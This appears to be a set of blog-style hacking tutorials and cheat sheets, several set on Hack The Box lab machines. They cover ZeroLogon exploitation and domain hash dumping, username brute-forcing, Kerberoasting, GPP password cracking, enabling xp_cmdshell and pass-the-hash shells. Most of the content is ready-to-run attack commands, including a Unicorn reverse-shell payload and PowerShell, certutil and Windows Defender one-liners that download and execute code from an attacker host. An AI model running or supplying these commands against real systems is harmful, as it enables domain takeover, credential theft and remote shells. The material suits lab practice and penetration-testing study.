Hacking Tutorial, Windows Updates/Patches

Abusing CVE-2020-1472 (ZeroLogon)

Secura has a great blog post on this topic already, but I wanted to share my experience with actually playing with their proof-of-concept exploit code. You can read about this exploit on their blog at https://www.secura.com/blog/zero-logon.

The exploit abuses the Netlogon Remote Protocol in Windows, which among other things, can be used to update computer passwords.

This vulnerability, and patch, isn’t exactly new. Microsoft released a patch for it last month, but there are now some public POCs in the wild that anybody can get their hands on, making this much more dangerous to leave un-patched.


Installing Tools

First, we’re going to need a few things from GitHub. I like to download the tools in my /opt directory. You can run the following command to download the prerequisites.

sudo git clone https://github.com/dirkjanm/CVE-2020-1472.git

And then we need to download and install Impacket.

sudo git clone https://github.com/SecureAuthCorp/impacket.git

cd /opt/impacket

sudo pip3 install .


Performing the Exploit

The above mentioned POC exploit will reset the password of the domain controller account, so BE CAREFUL RUNNING IN PRODUCTION as it will break communication to other domain controllers in the domain.

To reset the password of the domain controller account and make it null, we can use the following command.

python3 cve-2020-1472-exploit.py <netBIOS-Hostname> <targetIP>

If you see that the exploit was successful, you should then be able to run a command like the following to dump all of the domain account hashes.

sudo secretsdump.py -just-dc <domain>/<hostname>\$@<targetIP>


Restoring the Environment

The proof-of-concept exploit code also includes a script for restoring the old credential post-exploitation. To do this, you can grab the hex encoded machine password from the secretsdump.py output and then use the following command.

sudo python restorepassword.py <domain>/<hostname>@<hostname> -target-ip <target-IP> -hexpass <hex-credential>


Patching the Exploit

A patch is available from Microsoft at the following URL. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472

While the above mentioned article includes a table with a list of patches, I’d highly recommend checking the Windows Update Catalog for patches that might have superseded the articles mentioned in this table. For example, the September roll-ups contain this patch and are not listed in the table.

Running this exploit against a machine that has received the patch will return the following result.

Hacking Tutorial

Bruteforcing Usernames w/ WFuzz

In a recent post, I showed you how to Brute-force Subdomains w/ WFuzz. This time, I’m going to show you how we can use the same tool to brute-force a list of valid users. This guide is going to use Falafel from Hack The Box as an example, but does not intend to serve as a walkthrough or write-up of the machine.


Setting the Stage

If we navigate to the web interface of the box, we can attempt to sign into a login page. We notice that when we type a valid username into the field, the error message states “Wrong identification“.

However, entering a username that doesn’t exist returns a message that states “Try again..” We can use this to enumerate valid usernames.

Looking at the request in Burp, we see that its being sent as a /POST request with two parameters; username and password.


Using WFuzz to Brute-Force Valid Users

To begin, we’ll need a wordlist that contains a list of usernames. Seclists has one that is great for this, which you can get from Github. I have mine downloaded already.

Let’s start piecing together our command! Let me break down all the pieces that we’ll use.

-c : Return output in color.
-z file,<wordlist> : Specify our payload. In this case, a list of usernames.
--sc 200 : Show responses that return a response code of 200.
-d "username=FUZZ&password=anything" : Provide parameters for the /POST request.

Putting all of the above together, this is what our first command looks like!

wfuzz -c -z file,/usr/share/seclists/Usernames/Names/names.txt --sc 200 -d "username=FUZZ&password=anything" http://10.10.10.73/login.php

Running this doesn’t actually produce results we want though. That’s because every page comes back w/ a success 200 response code.

However, notice that each response contains 657 words. Let’s rewrite our command so that it only shows us results that DO NOT contain 657 words.

wfuzz -c -z file,/usr/share/seclists/Usernames/Names/names.txt --hw 657 -d "username=FUZZ&password=anything" http://10.10.10.73/login.php

After letting it run for a bit, we start to enumerate a list of users!

Hacking Tutorial

Performing Kerberoast Attacks in Windows Active Directory

Once you have low-level credentials to a Windows domain, you may be able to leverage those credentials to perform a Kerberoast attack against a higher-level user account. The easiest way to identify if a user account is vulnerable to a Kerberoast attack is via BloodHound.

Once you have identified a Kerberoastable user, you can leverage Impacket to perform the attack w/ the following command. This command will require valid domain credentials for at least a low-level user, but it should return the password hash of any Kerberoastable user on the domain.

GetUserSPNs.py -request -dc-ip <ip-addr> <domain>/<user>

We can then take this password hash to hashcat with the following command.

hashcat -m 13100 <hashfile> <wordlist>

Hacking Tutorial

Cracking Group Policy Preferences File (GPP XML)

There are some great posts out there that already explain what this vulnerability is. I would suggest reading up on it over at https://adsecurity.org/?p=2288.

However, if you come across an old GPP XML file, you may be able to extract a password hash from it. The file is typically found at path similar to the one shown below.

\hostname.domain\Policies\{00000000–0000-0000–0000-00000000000}\MACHINE\Preferences\Groups\Groups.xml

As an example, we found a file on Active at Hack The Box that looks like the following. Within Line 2, there is a cpassword hash that we can extract.

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

If we extract that password, we can use a tool to crack it.

gpp-decrypt <hash>

Note: If you don’t have this tool, you can download it with the following command: sudo apt install gpp-decrypt

Tips & Tricks

Enabling XP_CMDSHELL in SQL Server

If you ever get access to SQL credentials, you may be able to use a tool to connect to it via commandline and execute system commands via “XP_CMDSHELL”. However, this feature is not always enabled by default.

We’ll start by connecting to our target w/ the following command.

sqsh -S <ipAddress> -U <user> -P <password>

And then we’ll run the following commands to enable XP_CMDSHELL.

EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go

EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go

At this point, we should be able to execute our commands.

xp_cmdshell '<command>'

Tips & Tricks

Enumerating FTP for Pentesting (Port 21)

Basic Enumeration

Attempt to connect anonymously by issuing the below command and specifying the following credentials; anonymous:anonymous.

ftp <ipAddress>

You can perform banner grabbing w/ the following Metasploit module.

use auxiliary/scanner/ftp/ftp_version

You can perform brute force with the following Metasploit module.

use auxiliary/scanner/ftp/ftp_login


Transferring Files

If you have valid credentials, you can use the following command to download all files recursively.

wget --mirror 'ftp://<username>:<password>@<ipAddress>

Tips & Tricks

Dealing w/ Gobuster “WildCard” and “Status Code” Errors

Have you ever encountered the following error within Gobuster?

Error: the server returns a status code that matches the provided options for non existing urls. http://ipaddress/9b9353c0-3de2-4df5-abd7-0f618e4d70ab => 200. To force processing of Wildcard responses, specify the ‘–wildcard’ switch

Likely, the webserver you’re attacking is configured to always respond with a 200 response code. For example, let’s look at BART on Hack The Box.

Let’s see if we can extract anything with Curl. We’ll start by sending a request out to the default page. We see that it returns a 302 redirect to forum.bart.htb.

curl -vvv 10.10.10.81

Let’s try a request to a page we know doesn’t exist, and we are returned a success 200 message that displays an image. This explains why Gobuster was returning a 200 message on each directory.

We can confirm this by browsing to the page and looking at the image.

Armed with this information, we know that 200 response codes are bad, but other response codes (such as a 302) indicate a directory is present. Let’s rerun our Gobuster command, but we’ll specify which response codes we want returned.

Checking the help page, we can see that Gobuster accepts the following response codes; “200,204,301,302,307,401,403”.

So our command will look like this.

gobuster dir -u http://10.10.10.81 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -s "204,301,302,307,401,403"

And with that command running, we eventually start to get some real results back.

Tips & Tricks

Using Unicorn.py to Automate PowerShell Meterpeter Shells

There’s an awesome tool on Github you can download by running the following command.

sudo git clone https://github.com/trustedsec/unicorn.git

Running the Python script will generate some output that you can copy/paste to create the necessary payload.

python unicorn.py

For example, I can quickly generate a PowerShell reverse shell payload by running the following command.

sudo python unicorn.py windows/meterpreter/reverse_https <attackerIP> 443

That command created two files.

powershell_attack.txt – Contains my malicious PowerShell payload.
unicorn.rc – Will allow us to easily spin up a listener in Metasploit.

Let’s copy both of these files and move them over to where we want them. I will place powershell_attack.txt in a directory that I’m hosting up w/ a webserver, and then I’ll place unicorn.rc into a directory that I want to start my Metasploit listener within.

I’ll start my Metasploit listener with the following code.

sudo msfconsole -r unicorn.rc

And then we just need to execute the following PowerShell code on the victim.

powershell "IEX(New-Object Net.WebClient).downloadString('http://<attackerIP>/powershell_attack.txt')"

Tips & Tricks

Popping Remote Shells w/ winexe & pth-winexe on Windows

If you’re able to come across credentials or NTLM hashes for a Windows box that has SMB enabled, you may be able to leverage the tool called winexe to gain a shell. If you have captured a NTLM hash, say from dumping a SAM database, you may be able to pass-the-hash.


Basic syntax w/ credentials.

winexe -U <domain/username>%<password> //<targetIP> cmd.exe

Basic syntax w/ NTLM hash (pass the hash technique).

pth-winexe -U <domain/username>%<hash> //<targetIP> cmd.exe

Additional details about the command can be found here. https://tools.kali.org/maintaining-access/winexe

Tips & Tricks

Windows File Transfer Cheatsheet

Wanted to provide a single place to go for all file upload/download techniques when attacking a Windows machine from Kali Linux. This will be updated as I come across new ones and/or the next time I need to use them.


Uploading and Hosting Files

Python Web Server

The following will start a webserver in the present working directory using Python2.

python -m SimpleHTTP Server 80

The following will start a webserver in the present working directory using Python3.

python3 -m http.server 80


Impacket SMB Server

You can download Impacket from Github.

We’ll need to perform a few steps to set this up, but it’s a great way to transfer files to/from a system. To begin, let’s create a directory called smb on our attacking system. Files in this directory will be available on the other end, and likewise, the other end will be able to place files into this directory.

mkdir smb

impacket-smbserver <sharename> `<path>`

Then we can mount this file share in PowerShell from the other side.

New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName>

And change into the new drive.

cd <ShareName>:


Downloading Files

PowerShell

The following will download and store a remote file to disk.

Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe"

The following will download and automatically execute the remote PowerShell script when ran from a command prompt.

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')


CertUtil

The following will download and store a remote file to disk.

certutil.exe -urlcache -f "http://attackerIP/file.exe" file.exe


Windows Defender

The following will download and store a remote file to disk.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]